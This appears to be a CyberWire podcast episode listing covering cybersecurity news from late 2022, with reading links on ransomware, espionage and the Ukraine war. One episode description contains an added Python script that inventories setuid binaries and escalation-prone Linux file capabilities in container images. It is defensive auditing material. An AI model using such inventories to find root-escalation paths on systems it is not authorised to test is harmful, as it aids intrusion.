    Ransomware updates: TrueBot, Cl0p, and Royal. Iranian cyberattacks. An update on the cyberattack against the Met. Notes on the hybrid war, with a focus on allies and outside actors. Dec 12, 2022

TrueBot found in Cl0p ransomware attacks. Royal ransomware targets the healthcare sector. Recent Iranian cyber activity. A night at the opera: an update on the cyberattack against the Metropolitan Opera. New Cloud Atlas activity reported. Europe looks to the cybersecurity of its power grid. Rob Boyce from Accenture describes dark web actors diversifying their toolsets. Rick Howard explains fractional CISOs. And international support for Ukrainian cyber defense continues, more extensively and increasingly overtly.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/236


    Selected reading.

    Breaking the silence - Recent Truebot activity (Cisco Talos Blog)

    New TrueBot Malware Variant Leveraging Netwrix Auditor Bug and Raspberry Robin Worm (The Hacker News)

    TrueBot infections were observed in Clop ransomware attacks (Security Affairs)

    Clop ransomware uses TrueBot malware for access to networks (BleepingComputer)

    Royal Ransomware (US Department of Health and Human Services)

    US Dept of Health warns of ‘increased’ Royal ransomware attacks on hospitals (The Record by Recorded Future)

    Iran-Backed MuddyWater's Latest Campaign Abuses Syncro Admin Tool (Dark Reading)

    MuddyWater Hackers Target Asian and Middle East Countries with Updated Tactics (The Hacker News)

    New MuddyWater Campaign Uses Legitimate Remote Administration Tools to Deploy Malware (Cyber Security News)

    Shows will go on at Met Opera despite cyber-attack that crashed network (ABC7 New York)

    Cyberattack disrupts Metropolitan Opera (SC Media)

    Cloud Atlas targets entities in Russia and Belarus amid the ongoing war in Ukraine (Check Point Research)

    APT Cloud Atlas: Unbroken Threat (Positive Technologies)

    European Electricity Sector Lacks Cyber Experts as Ukraine War Raises Hacking Risks (Wall Street Journal)

    How the US has helped counter destructive Russian cyberattacks amid Ukraine war (The Hill)

    The Australian company training Ukrainian veterans in cybersecurity (Australian Financial Review)

    How Proton intends to thwart Russian cybercensorship with its VPN (HiTech Wiki)

    Cyber Lessons Learned from the War in Ukraine (YouTube)

    War in Ukraine Dominated Cybersecurity in 2022 (CNET)


    Jameeka Aaron: Sometimes you just have to follow two paths. [CISO] [Career Notes] Dec 11, 2022

    Jameeka Aaron, Chief Information Security Officer at Auth0, a product unit of Okta, sits down to share her story following two different paths that led her to where she is today. Jameeka has 20 years of IT and cybersecurity experience and has mitigated security risks at Nike, the U.S. Navy, and now Auth0. She joined the Navy not knowing what she wanted to do after high school and ended up becoming a Radioman, which is now titled IT. She shares her experiences of challenges she faced being the youngest, and the only woman, and the only woman of color in her group. She followed two different paths, getting an education as well as being in the Navy, and started her career at Lockheed Martin Mission Systems in San Diego. She eventually found her way to Auth0 in 2018. She says "I realized cybersecurity folks can do anything, everywhere. We're everywhere, we're in every industry and so I started to kind of say, I wanna work on programs that are fun for me." We thank Jameeka for sharing her story.


    Commercial threat intelligence proves invaluable for the public sector. [CyberWire-X] Dec 11, 2022

    Historically, the U.S. government has relied almost solely on its own intelligence analysis to inform strategic decisions. This has been especially true surrounding geopolitical events and nation-level cybersecurity situations.

    However, the explosion of assets being connected to the internet, along with the fact that most critical infrastructure is owned by private sector organizations, means that commercially developed cyber threat intelligence is being generated at a faster pace than ever before.

    In the Russia/Ukraine conflict, we saw how commercially generated satellite intelligence played a critical role in alerting the public and ensuring our allies were ready for an invasion. At LookingGlass, we believe commercial threat intelligence can provide similar anticipatory insight – and that it can be shared more easily and quickly than intelligence generated solely by the U.S. government.

    Ultimately, the public and private sectors need to work together to protect the interests of the American people. Currently, both private industry and academia are targeted by foreign adversaries, just as are government agencies. This means that commercial entities also have access to adversary tactics, techniques, and procedures (TTPs) and indicators of compromise, and they have that access from a different perspective, which is valuable intelligence for the government.

    On this episode of CyberWire-X, host Rick Howard, the CyberWire’s CISO, Chief Analyst and Senior Fellow, speaks with Hash Table member Wayne Moore, CISO at Simply Business, and host Dave Bittner speaks with Bryan Ware, CEO at episode sponsor LookingGlass Cyber Solutions. They’ll discuss why the U.S. government needs commercial cyber threat intelligence now more than ever before and how both the public and private sectors will benefit from closer, trusted cyber partnerships.


    Cybersecurity during the World Cup. [Research Saturday] Dec 10, 2022

AJ Nash from ZeroFox sits down with Dave to discuss cybersecurity threats, including social engineering attacks planned around the Qatar 2022 World Cup. The research shares some of the key threats we might see while the World Cup is happening this year.

    Researchers say "During the World Cup, there will likely be threat actors aiming to acquire personal information or monetary value through phishing and scams." The research also describes how the host is preparing for these anticipated attacks.

    The research can be found here:

    • Qatar 2022 World Cup Event Assessment

    Cobalt Mirage deploys Drokbk malware. Zombinder in the C2C market. Impersonation scams. CISA releases three new ICS advisories. And criminals prey on other criminals. Dec 09, 2022

    Cobalt Mirage deploys Drokbk malware. Zombinder in the C2C market. Impersonation scams: that's not Ukraine’s Ministry of Digital Transformation. On the cyber front, nothing new. CISA releases three new ICS advisories. Caleb Barlow on attack surface management. Mike Hamilton from Critical Insight explains how state and local governments apply for the $1 billion allocated by the feds for cybersecurity funding. And criminals prey on other criminals.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/235


    Selected reading.

    Drokbk Malware Uses GitHub as Dead Drop Resolver (Secureworks)

    Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers (ThreatFabric)

    Crypto Winter: Fraudsters Impersonate Ukraine’s Government to Steal NFTs and Cryptocurrency (DomainTools)

    Danish defence ministry says its websites hit by cyberattack (Reuters)

    Kela website hit by DoS attack (Yle)

    Advantech iView (CISA)

    AVEVA InTouch Access Anywhere (CISA)

    Rockwell Automation Logix controllers (CISA)

    The scammers who scam scammers on cybercrime forums: Part 1 (Sophos News)

    Cyber-criminals Scammed Each Other Out of Millions in 2022 (Infosecurity Magazine)


    The IT Army of Ukraine claims VTB DDoS. DPRK exploits Internet Explorer vulnerability. New variant of Babuk ransomware reported. Blind spots in air-gapped networks. And, dog and cat hacking. Dec 08, 2022

    The IT Army of Ukraine claims responsibility for DDoS against a Russian bank. North Korea exploits an Internet Explorer vulnerability. A new variant of Babuk ransomware has been reported. Blind spots in air-gapped networks. Rob Boyce from Accenture has insights on the most recent ransomware trends. Our guest is Nathan Howe from Zscaler with the latest on Zero Trust. And the hacking of cats and dogs.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/234


    Selected reading.

    IT Army of Ukraine Hit Russian Banking Giant with Crippling DDoS Attack (HackRead)

    Internet Explorer 0-day exploited by North Korean actor APT37 (Google)

    Morphisec Discovers Brand New Babuk Ransomware Variant in Major Attack (PRWeb)

    Bypassing air-gapped networks via DNS (Pentera)

    What to Know About an Unlikely Vector for Cyber Threats: Household Pets (Insurance Journal)


Ransomware, third-party risk, cyberespionage, social engineering, and a software supply-chain threat. Dec 07, 2022

    Rackspace reacts to ransomware. Third-party incidents in New Zealand and the Netherlands. Russian intelligence goes phishing. Mustang Panda uses Russia's war as phishbait. A malicious package is found in PyPI. Kevin Magee from Microsoft Canada shares thoughts on cybersecurity startups in an economic downturn. Our guest is IDology's Christina Luttrell to discuss how consumers feel about digital identity, fraud, security and data privacy. And a French-speaking investment scam.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/233


    Selected reading.

    Rackspace Technology Hosted Exchange Environment Update (Rackspace Technology)

    Multiple government departments in New Zealand affected by ransomware attack on IT provider (The Record by Recorded Future)

    Antwerp's city services down after hackers attack digital partner (BleepingComputer)

    Russian hacking group spoofed Microsoft login page of US military supplier: report (The Record by Recorded Future)

    Mustang Panda Uses the Russian-Ukrainian War to Attack Europe and Asia Pacific Targets (BlackBerry)

    Inside the Face-Off Between Russia and a Small Internet Access Firm (New York Times)

    Apiiro’s AI engine detected a software supply chain attack in PyPI (Apiiro | Cloud-Native Application Security)

    Anatomizing CryptosLabs: a scam syndicate targeting French-speaking Europe for years (Group-IB)


    CISA Alert AA22-335A – #StopRansomware: Cuba Ransomware [CISA Cybersecurity Alerts] Dec 07, 2022

    The FBI and CISA are releasing this alert to disseminate known Cuba Ransomware Group indicators of compromise and TTPs identified through FBI investigations.

    FBI and CISA would like to thank BlackBerry, ESET, The National Cyber-Forensics and Training Alliance (NCFTA), and Palo Alto Networks for their contributions to this CSA.

    AA22-335A Alert, Technical Details, and Mitigations

    For a downloadable copy of IOCs, see AA22-335A.stix

    Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

    Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov.

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Cyberespionage, privateering, hacktivism and influence operations, in Ukraine, Russia, the Middle East, and elsewhere. Criminals need quality control, too. A new entry in CISA’s KEV Catalog. Dec 06, 2022

A Chinese cyberespionage campaign is believed to be active in the Middle East. Poor quality control turns ransomware into a wiper, and a typo crashes a cryptojacker. A large DDoS attack is reported to have hit a Russian state-owned bank. Privateers compromise Western infrastructure to stage cyberattacks. Cyber operations against national morale. A look at the Vice Society. Ben Yelin on the growing concerns over TikTok. Ann Johnson from Afternoon Cyber Tea speaks with Charles Blauner about the evolution of the CISO role. And CISA has added an entry to its Known Exploited Vulnerabilities Catalog.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/232


    Selected reading.

    BackdoorDiplomacy Wields New Tools in Fresh Middle East Campaign (Bitdefender Labs)

    The Story of a Ransomware Turning into an Accidental Wiper | FortiGuard Labs (Fortinet Blog)

    Syntax errors are the doom of us all, including botnet authors (Ars Technica)

    Russia's No. 2 bank VTB suffers largest DDoS in history (Computing)

    Russia compromises major UK and US organisations to attack Ukraine (Lupovis)

    Russia’s online attacks target Ukrainians’ feelings (POLITICO)

    Vice Society: Profiling a Persistent Threat to the Education Sector (Unit 42)

    CISA Adds One Known Exploited Vulnerability to Catalog (CISA)


Swapping cyberattacks in a hybrid war. Privateers or just a side-hustle? US CSRB will investigate Lapsus$ Group. Notes on the cyber underworld. Dec 05, 2022

Wiper malware hits Russian targets. Microsoft sees an intensification of Russian cyber operations against Ukraine. State policy, privateering, or an APT side-hustle? The US Cyber Safety Review Board will investigate the Lapsus$ Group. Rackspace works to remediate a security incident. The Schoolyard Bully Trojan harvests credentials. Grayson Milbourne of OpenText Security Solutions on attacks on common open source dev libraries. Rick Howard looks at CISO career paths. And trends in ransomware: cybercrime succeeds when the gang runs like a business.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/231


    Selected reading.

    CryWiper: fake ransomware (Kaspersky).

    CryWiper data wiper targets Russian courts and mayors' offices (Computing)

    Never-before-seen malware is nuking data in Russia’s courts and mayors’ offices (Ars Technica)

    Russian regions attacked by new wiper posing as ransomware (Cybernews)

    Preparing for a Russian cyber offensive against Ukraine this winter (Microsoft On the Issues)

    Russia coordinating Ukraine hacks with missiles, could increasingly target European allies, Microsoft warns (POLITICO)

    Russia Is Boosting Its Cyber Attacks on Ukraine, Allies, Microsoft Says (Bloomberg.com)

    Hackers linked to Chinese government stole millions in Covid benefits (NBC News)

    Cyber Safety Review Board to Conduct Second Review on Lapsus$ (US Department of Homeland Security)

    Rackspace: Ongoing Exchange outage caused by security incident (BleepingComputer)

    Schoolyard Bully Trojan Facebook Credential Stealer (Zimperium)

    The Professionalization of Ransomware: How Gangs Are Becoming Like Businesses (LookingGlass Cyber Solutions Inc.)


    Rohit Dhamankar: Never close doors prematurely. [Vice President] [Career Notes] Dec 04, 2022

Rohit Dhamankar from Fortra’s Alert Logic sits down with Dave Bittner to share his experiences as he navigates the industry. Rohit has over 15 years of security industry experience across product strategy, threat research, product management and development, and customer solutions. Before Alert Logic he served in product roles for Live Oak Venture Capital at Infocyte and Razberi Technologies. He has previously worked in senior roles in several start-up companies in security analytics, intrusion detection/prevention, end-point protection, and security risk and compliance, including VP, Click Labs Solutions at Click Security, acquired by Alert Logic, and he was a Co-Founder of Jumpshot, acquired by Avast. Rohit shares the advice of never closing a door prematurely, because you never know what could be behind the door waiting for you. We thank Rohit for sharing his story.


    Old malware returns in a new way. [Research Saturday] Dec 03, 2022

Jeremy Kennelly and Sulian Lebegue from Mandiant sit down with Dave to discuss their research "From RM3 to LDR4: URSNIF Leaves Banking Fraud Behind?" One of the oldest and most successful banking fraud malware families, URSNIF, which caused an estimated “tens of millions of dollars in losses”, has been found by researchers to have been re-tooled into a generic backdoor, dubbed “LDR4”.

This new variant was first observed in June 2022. Mandiant researchers believe that the same threat actors who operated the RM3 variant of URSNIF are likely behind LDR4. They say "given the success and sophistication RM3 previously had, LDR4 could be a significantly dangerous variant—capable of distributing ransomware—that should be watched closely."

    The research can be found here:

    • From RM3 to LDR4: URSNIF Leaves Banking Fraud Behind

    Cuba ransomware pulls in $60 million. CISA releases three ICS advisories. Google announces new support for Ukraine. DDoSing the Vatican. Google supports Ukrainian startups in wartime. Dec 02, 2022

    Cuba ransomware pulls in $60 million. CISA releases three ICS advisories. DDoSing the Vatican. Andrea Little Limbago from Interos on the implications of Albania cutting off diplomatic ties with Iran. Our space correspondent Maria Varmazis speaks with Brandon Bailey about Space Attack Research and Tactic Analysis matrix. And how Google supports Ukrainian startups in wartime.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/230


    Selected reading.

    Alert (AA22-335A) #StopRansomware: Cuba Ransomware (CISA)

    Novel News on Cuba Ransomware: Greetings From Tropical Scorpius (Palo Alto Networks Unit 42)

    New ways we're supporting Ukraine (Google)

    25 new startup recipients of the Ukraine Support Fund (Google)

    Vatican shuts down its website amid hacking attempts (Cybernews)


    Cyberespionage, cybercrime, and patriotic hacktivism. The Heliconia framework described. Cyber risk for the telecom and healthcare sectors. Notes on the hybrid war. Predictions for 2023. Dec 01, 2022

    A new backdoor, courtesy of the DPRK. The Medibank breach is all over but the shouting (or, all over but the suing and the arresting). Risks and opportunities in telecom’s shift to cloud. Cyber risk in healthcare. An assessment of Russian cyber warfare. Robert M. Lee from Dragos assesses the growing value of the ICS security market. Our guest is Cecilia Seiden of TransUnion to discuss their 2022 Consumer Holiday Shopping Report. And it’s December, which means…predictions.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/229


    Selected reading.

    Who’s swimming in South Korean waters? Meet ScarCruft’s Dolphin (ESET)

    Medibank hackers announce ‘case closed’ and dump huge data file on dark web (the Guardian)

    New details on commercial spyware vendor Variston (Google)

    Risks and opportunities in telecom’s shift to cloud. (CyberWire)

    Moody’s discusses cyber risk in healthcare. (CyberWire)

    'Do something:' Ukraine works to heal soldiers' mental scars (AP NEWS)

    Reformed Russian Cybercriminal Warns That Hatred Spreads Hacktivism (Wall Street Journal)

    Cybersecurity predictions for 2023. (CyberWire)


    LockBit 3.0 and Punisher ransomware described. Leave that USB right in the parking lot where you found it. Killnet’s woofing. Lilac Wolverine’s big new BEC. And World Cup scams. Nov 30, 2022

Has LockBit 3.0 been reverse engineered? A COVID lure contains a Punisher hook. A Chinese cyberespionage campaign uses compromised USB drives. Lilac Wolverine exploits personal connections for BEC. Killnet claims to have counted coup against the White House. Tim Starks from the Washington Post has the FCC’s Huawei restrictions and ponders what Congress might get done before the year end. Our guest is Tom Eston from Bishop Fox with a look at Inside the Minds & Methods of Modern Adversaries. And, of course, scams, hacks, and other badness surrounding the World Cup.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/228


    Selected reading.

    LockBit 3.0 ‘Black’ attacks and leaks reveal wormable capabilities and tooling (Sophos News)

    Punisher Ransomware Spreading Through Fake COVID Site (Cyble)

    Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia (Mandiant)

    BEC Group Compromises Personal Accounts and Pulls Heartstrings to Launch Mass Gift Card Attacks (Abnormal Security)

    Killnet Claims Attacks Against Starlink, Whitehouse.gov, and United Kingdom Websites (Trustwave)

    Scammers on the pitch: Group-IB identifies online threats to fans at FIFA World Cup 2022 in Qatar (Group-IB)


    DDoS as a holiday-season threat to e-commerce. TikTok challenge spreads malware. Meta's GDPR fine. US Cyber Command describes support for Ukraine's cyber defense. Nov 29, 2022

    DDoS as a holiday-season threat to e-commerce. A TikTok challenge spreads malware. Meta's GDPR fine. Mr. Security Answer Person John Pescatore has thoughts on phishing resistant MFA. Joe Carrigan describes Intel’s latest efforts to thwart deepfakes. And US Cyber Command describes support for Ukraine's cyber defense.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/227


    Selected reading.

    Holiday DDoS Cyberattacks Can Hurt E-Commerce, Lack Legal Remedy (Bloomberg Law)

    TikTok ‘Invisible Body’ challenge exploited to push malware (BleepingComputer)

    $275M Fine for Meta After Facebook Data Scrape (Dark Reading)

    Before the Invasion: Hunt Forward Operations in Ukraine (U.S. Cyber Command)


    Keeping pentesting tools out of criminal hands. Updates from an intensified cyber phase in Russia’s hybrid war. Fars reports sustaining a cyber attack. The most common password remains “password.” Nov 28, 2022

    Nighthawk’s at the diner (but maybe not on the crooks’ menu). Internet service in Ukraine and Moldova is interrupted by strikes against Ukraine's power grid. Sandworm renews ransomware activity against Ukrainian targets. Russian cyber-reconnaissance seen at a Netherlands LNG terminal. European Parliament votes to declare Russia a terrorist state (and Russia responds with cyberattacks and terroristic threats). Carole Theriault reports on where these kids today are getting their news. Malek Ben Salem from Accenture on digital identity in Web 3.0. And, hey, the new list of most commonly used passwords looks...depressingly familiar.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/226


    Selected reading.

    Sec firm MDSec slams Proofpoint for post on pen-testing framework (iTWire)

    Nighthawk: With Great Power Comes Great Responsibility - MDSec

    Cyberattack Hits Iran's Fars News Agency (RadioFreeEurope/RadioLiberty)

    Iran’s Fars news agency is hit by cyberattacks, blames Israel (Times of Israel)

    Ukraine and Moldova suffer internet disruptions after Russian missile strikes (The Record by Recorded Future)

    New ransomware attacks in Ukraine linked to Russian Sandworm hackers (BleepingComputer)

    Russian hackers targeting Dutch gas terminal: report (NL Times)

    Russia labelled state sponsor of terrorism as missile strikes leave Ukraine without power (The Telegraph)

    Killnet Group Claims Responsibility for European Parliament Cyber Attack (Digit)

    European Parliament hit by 'sophisticated' cyberattack (Deutsche Welle)

    European Parliament website suffers 'sophisticated' cyber attack after Russia terrorism vote (Computing)

    Hackers Temporarily Take Down European Parliament Website (Wall Street Journal)

    Guess the most common password. Hint: We just told you (Register)


    Laura Whitt-Winyard: Securing the world. [CISO] [Career Notes] Nov 27, 2022

    Laura Whitt-Winyard, CISO from Malwarebytes, sits down to share her story, beginning with a desire to be a pediatric oncologist that she later discovered was not the path for her. Laura was bouncing around from job to job until she bought her first computer, and a light bulb went off in her head. She set out to make it her goal to learn about this new, interesting field and grow within it. Now as a successful CISO, she wants to make the world more secure and goes from company to company to complete her goal. She considers herself a servant leader whose goal is the greater good. She compares her role to football, explaining that she is not the quarterback, but the center for the team. She believes she is the center that paves the path for the quarterbacks on her team to reduce the noise, to give the quarterback all the tools that they need to do their jobs and do their jobs well. We thank Laura for sharing her story.


    Encore: The secrets behind Docker. Nov 26, 2022

Alon Zahavi from CyberArk joins Dave Bittner on this episode to discuss CyberArk's research, published in conjunction with Patch Tuesday, on how Docker inadvertently created a new vulnerability and what happens when it's exploited.

CyberArk's research concluded that an attacker could execute files that carry Linux file capabilities, or setuid files, to escalate privileges up to root. CyberArk found the vulnerability in some of Microsoft’s Docker images; it was caused by misuse of Linux capabilities, the mechanism that splits root's privileges into distinct units which administrators can assign to processes and to files.
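The check a practitioner would want after reading the paragraph above is an inventory of exactly the two things CyberArk describes: setuid/setgid binaries and files carrying capabilities inside an image. The Python below is an added example written for this page, not CyberArk's code or anything from their research. It walks a directory tree (for instance a root filesystem unpacked from `docker export`), flags setuid/setgid regular files, reads the `security.capability` extended attribute where present (Linux only; `os.getxattr` does not exist elsewhere) and decodes its `vfs_cap_data` layout into capability names. The `ESCALATION_CAPS` set is this example's own judgement of which capabilities matter most, and `build_sample_rootfs` is a constructed fixture, not a real image.

```python
import os
import stat
import struct
import tempfile
from typing import Dict, List, Optional

# Capability bit numbers from linux/capability.h (subset; other bits are
# reported as cap_<n>).
_CAP_NAMES = {
    0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search", 3: "cap_fowner",
    4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid", 7: "cap_setuid", 8: "cap_setpcap",
    10: "cap_net_bind_service", 12: "cap_net_admin", 13: "cap_net_raw",
    16: "cap_sys_module", 17: "cap_sys_rawio", 18: "cap_sys_chroot",
    19: "cap_sys_ptrace", 21: "cap_sys_admin", 27: "cap_mknod", 31: "cap_setfcap",
}
# Assumption (this example's judgement): capabilities that, set on a binary an
# unprivileged user can run, give a route to root or to arbitrary file access.
ESCALATION_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_chown", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
    "cap_setfcap", "cap_mknod",
}


def _cap_names(mask: int) -> List[str]:
    return [_CAP_NAMES.get(b, f"cap_{b}") for b in range(64) if (mask >> b) & 1]


def decode_file_caps(raw: bytes) -> Dict[str, object]:
    """Decode the security.capability xattr (struct vfs_cap_data, little-endian):
    u32 magic_etc (version in the top byte, bit 0 = effective flag), then one
    (v1) or two (v2/v3) {u32 permitted, u32 inheritable} pairs."""
    if len(raw) < 12:
        raise ValueError("security.capability xattr too short")
    magic, permitted, inheritable = struct.unpack_from("<III", raw, 0)
    if len(raw) >= 20:  # second pair carries capabilities 32..63
        hi_p, hi_i = struct.unpack_from("<II", raw, 12)
        permitted |= hi_p << 32
        inheritable |= hi_i << 32
    return {"version": (magic >> 24) & 0xFF, "effective": bool(magic & 1),
            "permitted": _cap_names(permitted), "inheritable": _cap_names(inheritable)}


def is_escalation_risk(caps: Dict[str, object]) -> bool:
    return bool(ESCALATION_CAPS.intersection(caps["permitted"]))


def _file_caps(path: str) -> Optional[bytes]:
    # os.getxattr exists only on Linux; any OSError (ENODATA, ENOTSUP) means
    # "no capability set on this file".
    if not hasattr(os, "getxattr"):
        return None
    try:
        return os.getxattr(path, "security.capability", follow_symlinks=False)
    except OSError:
        return None


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Report regular files under root that are setuid/setgid or carry file
    capabilities. Symlinks are not followed, so the scan stays inside root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = [n for flag, n in ((stat.S_ISUID, "setuid"), (stat.S_ISGID, "setgid"))
                    if st.st_mode & flag]
            if bits:
                findings.append({"path": path, "reason": "+".join(bits),
                                 "mode": oct(st.st_mode & 0o7777), "risk": True})
            raw = _file_caps(path)
            if raw:
                caps = decode_file_caps(raw)
                findings.append({"path": path, "reason": "file-capability",
                                 "caps": caps, "risk": is_escalation_risk(caps)})
    return findings


def build_sample_rootfs() -> str:
    """Constructed fixture standing in for an exported image: one setuid
    script and one ordinary file (not a real image)."""
    root = tempfile.mkdtemp(prefix="rootfs-")
    for rel, mode, body in (("usr/bin/helper", 0o4755, "#!/bin/sh\nid\n"),
                            ("etc/plain.conf", 0o644, "x=1\n")):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_rootfs()):
        print(hit)
```

Against a real image, unpack it first (`docker export <container> | tar -xC ./rootfs`) and point `scan_tree` at `./rootfs`; a file-capability finding with `risk: True` is the case the CyberArk paragraph describes, since a non-root process inside the container can run that binary and inherit its permitted set.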

    The research can be found here:

    • How Docker Made Me More Capable and the Host Less Secure

    Interview Select: Perry Carpenter on his new book "The Security Culture Playbook." [CW Pro] Nov 25, 2022

This interview, from June 3rd, 2022, originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with Perry Carpenter, host of 8th Layer Insights, to discuss his new book "The Security Culture Playbook: An Executive Guide To Reducing Risk and Developing Your Human Defense Layer."


    Research Briefing: Emotet's return. LodaRAT improvements. Callback phishing leads to data theft extortion. [CW Pro] Nov 24, 2022

    Emotet's return. LodaRAT improvements. Callback phishing leads to data theft extortion.


    Watch out for abuse of pentesting tools. Cyber attack on Guadeloupe. Ducktail’s evolution. Cybersecurity for ports. ICS security advisories. And stay safe shopping during the holidays. Nov 23, 2022

Another pentesting tool may soon be abused by threat actors. A cyberattack disrupts Guadeloupe. Ducktail evolves and expands. A warning about the disruption cyberattacks could cause at European ports. CISA releases eight industrial control system advisories. Patrick Tiquet, VP of Security and Architecture at Keeper Security, talks about the FedRAMP authorization process. Bryan Vorndran of the FBI Cyber Division with reflections on ransomware. And stay safe on Black Friday (and Cyber Monday, and Panic Saturday, and…you get the picture).


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/225


    Selected reading.

    Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice (Proofpoint)

    Making Cobalt Strike harder for threat actors to abuse (Google Cloud Blog)

    Guadeloupe government fights 'large-scale' cyberattack (AP NEWS)

    Vietnam-Based Ducktail Cybercrime Operation Evolving, Expanding (SecurityWeek)

    Cyber as important as missile defences - ex-NATO general (Reuters)

    CISA Releases Eight Industrial Control Systems Advisories (CISA)

    Black Friday and Cyber Monday risks. (CyberWire)


    Recent criminal activity–it’s as opportunistic as ever. Cyber risk to the pharma sector. Updates on the hybrid war. Returning Cobalt Strike to the legitimate red teams. Nov 22, 2022

Daixin Team claims ransomware attack against AirAsia. DraftKings users suffer credential harvesting and paycard theft. Assessing cyber risk in the US pharmaceutical industry. Killnet claims successes few others can discern. In Ukraine, kinetic attacks on IT infrastructure eclipse cyberattacks. Carole Theriault on digital echo chambers and what's in it for us. Nancy Wang from Fortra's Alert Logic discusses how she is helping more young women get into the STEM field and leadership positions. Google seeks to render Cobalt Strike less useful to threat actors.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/224


    Selected reading.

    Daixin Team claims AirAsia ransomware attack with five million customer records leaked (Tech Monitor)

    Daixin Ransomware Gang Steals 5 Million AirAsia Passengers' and Employees' Data (The Hacker News)

    DraftKings Users Hacked, Money In Account "Cashed Out" (Action Network)

    DraftKings says no evidence systems were breached following report of a hack (CNBC)

    Assessing cyber risk in the US pharmaceutical industry. (CyberWire)

    Killnet DDoS hacktivists target Royal Family and others (ComputerWeekly.com)

    Ukraine Data Centers Became Physical Targets When Cyber Attacks Failed (Meritalk)

    Making Cobalt Strike harder for threat actors to abuse (Google Cloud Blog)

    Google seeks to make Cobalt Strike useless to attackers (Help Net Security)

    Google Releases YARA Rules to Disrupt Cobalt Strike Abuse (Dark Reading)

    Google releases 165 YARA rules to detect Cobalt Strike attacks (BleepingComputer)


Callback phishing offers to solve your problem (it won’t). Mustang Panda’s recent activities. DEV-0569’s malvertising campaign. 10 indicted in BEC case. Developing a cyber auxiliary force. Nov 21, 2022

Luna Moth's callback phishing offers an unpleasant and less familiar form of social engineering. New activity by China's Mustang Panda is reported. DEV-0569 is using malvertising to distribute Royal ransomware. US indicts 10 in a business email compromise case. Developing a cyber auxiliary. Dave Bittner sits down with AJ Nash from ZeroFox to discuss holiday scams. Our own Rick Howard speaks with us about cloud security. And beware of Black Friday scams.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/223


    Selected reading.

    Threat Assessment: Luna Moth Callback Phishing Campaign (Unit 42)

    DEV-0569 finds new ways to deliver Royal ransomware, various payloads (Microsoft Security)

    Earth Preta Spear-Phishing Governments Worldwide (Trend Micro)

    EXCLUSIVE: Rounding up a cyber posse for Ukraine (The Record by Recorded Future)

    Tech for good: How the IT industry is helping Ukraine (Computing)

    10 Charged in Business Email Compromise and Money Laundering Schemes Targeting Medicare, Medicaid, and Other Victims (US Department of Justice)

    Black Friday and Cyber Monday risks. (CyberWire)


    Omer Singer: The offense and the defense of cybersecurity. [Strategy] [Career Notes] Nov 20, 2022

    Omer Singer, Lead Cybersecurity Strategist from Snowflake, sits down to share his experience getting into the cybersecurity field. Growing up, he knew he wanted to work with computers, but he just didn't know what he wanted to do within the field. His college gave him great hands-on experience to then transition into the workforce. He's played both on the offense and defense of cybersecurity, and he says that experience showed him and he "kind of saw firsthand, uh, what a well funded and motivated, uh, team of cybersecurity experts can do and it's pretty scary." In addition, Omer is a big advocate for encouraging other security professionals to learn data skills, and strongly stands by the belief that the future of cybersecurity is in borrowing from modern data analytics tools and techniques that enable consistent risk reduction. He also makes it a priority to invest in his people, believing that this unlocks intrinsic motivation that enables a ton of personal growth and accomplishment, and is a big believer in the OKR system for enabling security operations and avoiding burnout. We thank Omer for sharing his story.


    Another infection with new malware. [Research Saturday] Nov 19, 2022

